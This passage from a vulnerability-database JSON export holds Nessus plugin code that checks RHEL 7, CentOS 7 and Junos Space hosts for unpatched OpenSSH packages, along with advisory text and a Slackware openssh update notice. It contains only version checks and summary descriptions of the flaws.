value:\"https://access.redhat.com/security/cve/cve-2016-10708\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssh-askpass\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssh-cavs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssh-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssh-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssh-keycat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssh-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssh-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssh-server-sysvinit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pam_ssh_agent_auth\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:2029\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"openssh-7.4p1-11.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openssh-7.4p1-11.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"openssh-askpass-7.4p1-11.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openssh-askpass-7.4p1-11.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"openssh-cavs-7.4p1-11.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openssh-cavs-7.4p1-11.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"openssh-clients-7.4p1-11.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openssh-clients-7.4p1-11.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"openssh-debuginfo-7.4p1-11.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"openssh-keycat-7.4p1-11.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", 
reference:\"openssh-keycat-7.4p1-11.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"openssh-ldap-7.4p1-11.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openssh-ldap-7.4p1-11.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"openssh-server-7.4p1-11.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openssh-server-7.4p1-11.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"openssh-server-sysvinit-7.4p1-11.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openssh-server-sysvinit-7.4p1-11.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"pam_ssh_agent_auth-0.10.3-1.11.el7\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh / openssh-askpass / openssh-cavs / openssh-clients / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-06T09:31:33", "description": "An update for openssh is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nOpenSSH is an SSH protocol implementation supported by a number of\nLinux, UNIX, and similar operating systems. It includes the core files\nnecessary for both the OpenSSH client and server.\n\nThe following packages have been upgraded to a later upstream version:\nopenssh (7.4p1). 
(BZ#1341754)\n\nSecurity Fix(es) :\n\n* A covert timing channel flaw was found in the way OpenSSH handled\nauthentication of non-existent users. A remote unauthenticated\nattacker could possibly use this flaw to determine valid user names by\nmeasuring the timing of server responses. (CVE-2016-6210)\n\n* It was found that OpenSSH did not limit password lengths for\npassword authentication. A remote unauthenticated attacker could use\nthis flaw to temporarily trigger high CPU consumption in sshd by\nsending long passwords. (CVE-2016-6515)\n\n* It was found that ssh-agent could load PKCS#11 modules from\narbitrary paths. An attacker having control of the forwarded\nagent-socket on the server, and the ability to write to the filesystem\nof the client host, could use this flaw to execute arbitrary code with\nthe privileges of the user running ssh-agent. (CVE-2016-10009)\n\n* It was found that the host private key material could possibly leak\nto the privilege-separated child processes via re-allocated memory. An\nattacker able to compromise the privilege-separated process could\ntherefore obtain the leaked key information. (CVE-2016-10011)\n\n* It was found that the boundary checks in the code implementing\nsupport for pre-authentication compression could have been optimized\nout by certain compilers. An attacker able to compromise the\nprivilege-separated process could possibly use this flaw for further\nattacks against the privileged monitor process. 
(CVE-2016-10012)\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.4 Release Notes linked from the References section.", "edition": 26, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-08-25T00:00:00", "title": "CentOS 7 : openssh (CESA-2017:2029)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10708", "CVE-2016-10011", "CVE-2016-10009", "CVE-2016-6515", "CVE-2016-6210", "CVE-2016-10012"], "modified": "2017-08-25T00:00:00", "cpe": ["p-cpe:/a:centos:centos:openssh-keycat", "p-cpe:/a:centos:centos:openssh-ldap", "p-cpe:/a:centos:centos:openssh", "p-cpe:/a:centos:centos:openssh-server", "cpe:/o:centos:centos:7", "p-cpe:/a:centos:centos:openssh-server-sysvinit", "p-cpe:/a:centos:centos:openssh-clients", "p-cpe:/a:centos:centos:openssh-askpass", "p-cpe:/a:centos:centos:openssh-cavs", "p-cpe:/a:centos:centos:pam_ssh_agent_auth"], "id": "CENTOS_RHSA-2017-2029.NASL", "href": "https://www.tenable.com/plugins/nessus/102751", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:2029 and \n# CentOS Errata and Security Advisory 2017:2029 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102751);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-10009\", \"CVE-2016-10011\", \"CVE-2016-10012\", \"CVE-2016-10708\", \"CVE-2016-6210\", \"CVE-2016-6515\");\n script_xref(name:\"RHSA\", value:\"2017:2029\");\n\n script_name(english:\"CentOS 7 : openssh (CESA-2017:2029)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more 
security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for openssh is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nOpenSSH is an SSH protocol implementation supported by a number of\nLinux, UNIX, and similar operating systems. It includes the core files\nnecessary for both the OpenSSH client and server.\n\nThe following packages have been upgraded to a later upstream version:\nopenssh (7.4p1). (BZ#1341754)\n\nSecurity Fix(es) :\n\n* A covert timing channel flaw was found in the way OpenSSH handled\nauthentication of non-existent users. A remote unauthenticated\nattacker could possibly use this flaw to determine valid user names by\nmeasuring the timing of server responses. (CVE-2016-6210)\n\n* It was found that OpenSSH did not limit password lengths for\npassword authentication. A remote unauthenticated attacker could use\nthis flaw to temporarily trigger high CPU consumption in sshd by\nsending long passwords. (CVE-2016-6515)\n\n* It was found that ssh-agent could load PKCS#11 modules from\narbitrary paths. An attacker having control of the forwarded\nagent-socket on the server, and the ability to write to the filesystem\nof the client host, could use this flaw to execute arbitrary code with\nthe privileges of the user running ssh-agent. (CVE-2016-10009)\n\n* It was found that the host private key material could possibly leak\nto the privilege-separated child processes via re-allocated memory. An\nattacker able to compromise the privilege-separated process could\ntherefore obtain the leaked key information. 
(CVE-2016-10011)\n\n* It was found that the boundary checks in the code implementing\nsupport for pre-authentication compression could have been optimized\nout by certain compilers. An attacker able to compromise the\nprivilege-separated process could possibly use this flaw for further\nattacks against the privileged monitor process. (CVE-2016-10012)\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.4 Release Notes linked from the References section.\"\n );\n # https://lists.centos.org/pipermail/centos-cr-announce/2017-August/004417.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5ff4711b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssh packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-6515\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssh-askpass\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssh-cavs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssh-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssh-keycat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssh-ldap\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:centos:centos:openssh-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssh-server-sysvinit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pam_ssh_agent_auth\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"openssh-7.4p1-11.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"openssh-askpass-7.4p1-11.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"openssh-cavs-7.4p1-11.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"openssh-clients-7.4p1-11.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"openssh-keycat-7.4p1-11.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"openssh-ldap-7.4p1-11.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"openssh-server-7.4p1-11.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"openssh-server-sysvinit-7.4p1-11.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"pam_ssh_agent_auth-0.10.3-1.11.el7\")) flag++;\n\n\nif (flag)\n{\n cr_plugin_caveat = '\\n' +\n 'NOTE: The security advisory associated with this vulnerability has a\\n' +\n 'fixed package version that may only be available in the continuous\\n' +\n 'release (CR) repository for CentOS, until it is present in the next\\n' +\n 'point release of CentOS.\\n\\n' +\n\n 'If an equal or higher package level does not exist in the baseline\\n' +\n 'repository for your major version of CentOS, then updates from the CR\\n' +\n 'repository will need to be applied in order to address the\\n' +\n 'vulnerability.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() 
+ cr_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh / openssh-askpass / openssh-cavs / openssh-clients / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-01T03:19:40", "description": "According to its self-reported version number, the version of Junos\nSpace running on the remote device is < 18.2R1, and is therefore\naffected by multiple vulnerabilities:\n\n - Due to an untrusted search path vulnerability in ssh-agent.c in ssh-agent\n in OpenSSH before 7.4, an unauthenticated, remote attacker can execute\n arbitrary local PKCS#11 modules by leveraging control over a forwarded \n agent-socket. (CVE-2016-10009)\n \n - In OpenSSH before 7.4, an authenticated local attacker can escalate \n privileges via unspecified vectors, related to serverloop.c. \n (CVE-2016-10010)\n \n - authfile.c in sshd in OpenSSH before 7.4 does not properly consider the \n effects of realloc on buffer contents. An authenticated local attacker \n can obtain sensitive private-key information by leveraging access to a \n privilege-separated child process. (CVE-2016-10011)\n \n - In sshd in OpenSSH before 7.4, a local attacker can gain privileges by \n leveraging access to a sandboxed privilege-separation process due to a\n bounds check that's enforced by all by the shared memory manager. \n (CVE-2016-10012)\n \n - The process_open function in sftp-server.c in OpenSSH before 7.6 does not\n properly prevent write operations in readonly mode, which allows local \n attackers to create zero-length files. (CVE-2017-15906)\n \n - A reflected cross-site scripting vulnerability in OpenNMS included\n with Juniper Networks Junos Space may allow the stealing of sensitive\n information or session credentials from Junos Space administrators or\n perform administrative actions. 
(CVE-2018-0046)", "edition": 17, "cvss3": {"score": 7.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2019-07-05T00:00:00", "title": "Juniper Junos Space < 18.2R1 Multiple Vulnerabilities (JSA10880)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10011", "CVE-2016-10009", "CVE-2016-10010", "CVE-2018-0046", "CVE-2017-15906", "CVE-2016-10012"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:juniper:junos_space"], "id": "JUNIPER_SPACE_JSA10880.NASL", "href": "https://www.tenable.com/plugins/nessus/126510", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(126510);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/07/11 12:05:35\");\n\n script_cve_id(\n \"CVE-2016-10009\",\n \"CVE-2016-10010\",\n \"CVE-2016-10011\",\n \"CVE-2016-10012\",\n \"CVE-2017-15906\",\n \"CVE-2018-0046\"\n );\n script_bugtraq_id(\n 94968,\n 94972,\n 94975,\n 94977,\n 101552,\n 105566\n );\n script_xref(name:\"JSA\", value:\"JSA10880\");\n\n script_name(english:\"Juniper Junos Space < 18.2R1 Multiple Vulnerabilities (JSA10880)\");\n script_summary(english:\"Checks the version of Junos Space.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the version of Junos\nSpace running on the remote device is < 18.2R1, and is therefore\naffected by multiple vulnerabilities:\n\n - Due to untrusted search path vulnerability in ssh-agent.c in ssh-agent\n in OpenSSH before 7.4, unauthenticated, remote attacker can execute execute\n arbitrary local PKCS#11 modules by leveraging control over a forwarded \n agent-socket. (CVE-2016-10009)\n \n - In OpenSSH before 7.4, an authenticated local attacker can escalate \n privileges via unspecified vectors, related to serverloop.c. 
\n (CVE-2016-10010)\n \n - authfile.c in sshd in OpenSSH before 7.4 does not properly consider the \n effects of realloc on buffer contents. an authenticated local attacker \n can obtain sensitive private-key information by leveraging access to a \n privilege-separated child process. (CVE-2016-10011)\n \n - In sshd in OpenSSH before 7.4, a local attacker can gain privileges by \n leveraging access to a sandboxed privilege-separation process due to a\n bounds check that's enforced by all by the shared memory manager. \n (CVE-2016-10012)\n \n - The process_open function in sftp-server.c in OpenSSH before 7.6 does not\n properly prevent write operations in readonly mode, which allows local \n attackers to create zero-length files. (CVE-2017-15906)\n \n - A reflected cross-site scripting vulnerability in OpenNMS included\n with Juniper Networks Junos Space may allow the stealing of sensitive\n information or session credentials from Junos Space administrators or\n perform administrative actions. 
(CVE-2018-0046)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10880\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Junos Space version 18.2R1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-10009\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n \n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/07/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:juniper:junos_space\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Junos Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Junos_Space/version\");\n\n exit(0);\n}\n\ninclude('junos.inc');\ninclude('misc_func.inc');\n\nver = get_kb_item_or_exit('Host/Junos_Space/version');\n\ncheck_junos_space(ver:ver, fix:'18.2R1', severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "slackware": [{"lastseen": "2020-10-25T16:36:01", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10009", "CVE-2016-10010", "CVE-2016-10011", "CVE-2016-10012"], "description": "New openssh packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\n14.2, and -current to fix security issues.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/openssh-7.4p1-i586-1_slack14.2.txz: Upgraded.\n This is primarily a bugfix release, and also addresses security issues.\n ssh-agent(1): Will now refuse to load PKCS#11 modules from paths outside\n a trusted whitelist.\n sshd(8): When privilege separation is disabled, forwarded Unix-domain\n sockets would be created by sshd(8) with the privileges of 'root'.\n sshd(8): Avoid theoretical leak of host private key material to\n privilege-separated child processes via realloc().\n sshd(8): The shared memory manager used by pre-authentication compression\n support had a bounds checks that could be elided by some optimising\n compilers to potentially allow attacks against the privileged monitor.\n process from the sandboxed privilege-separation process.\n sshd(8): Validate address ranges for AllowUser and DenyUsers directives at\n configuration load time and refuse to accept invalid ones. It was\n previously possible to specify invalid CIDR address ranges\n (e.g. 
user@127.1.2.3/55) and these would always match, possibly resulting\n in granting access where it was not intended.\n For more information, see:\n https://www.openssh.com/txt/release-7.4\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10009\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10010\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10011\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10012\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssh-7.4p1-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssh-7.4p1-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssh-7.4p1-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssh-7.4p1-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssh-7.4p1-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssh-7.4p1-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssh-7.4p1-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssh-7.4p1-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 
14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssh-7.4p1-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssh-7.4p1-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/openssh-7.4p1-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/openssh-7.4p1-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssh-7.4p1-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssh-7.4p1-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 13.0 package:\n7fce1ebdb63b97beaeb98f450676171c openssh-7.4p1-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n26fbf1aa33f5b289b15435a904b5d2a0 openssh-7.4p1-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\n5b8a87019ca527acba1f607af9175cfb openssh-7.4p1-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n29aa129063c2667612485edeac5c072b openssh-7.4p1-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\n6d9aabce1fc85756b7863cbf1cf389a9 openssh-7.4p1-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\ne57e264dccefc2621bd45838d96bb10d openssh-7.4p1-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\n7613f561db6b8616ec2b0a283e4487d6 openssh-7.4p1-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n7a834d8b295da5ea88bac1340e359711 openssh-7.4p1-x86_64-1_slack14.0.txz\n\nSlackware 14.1 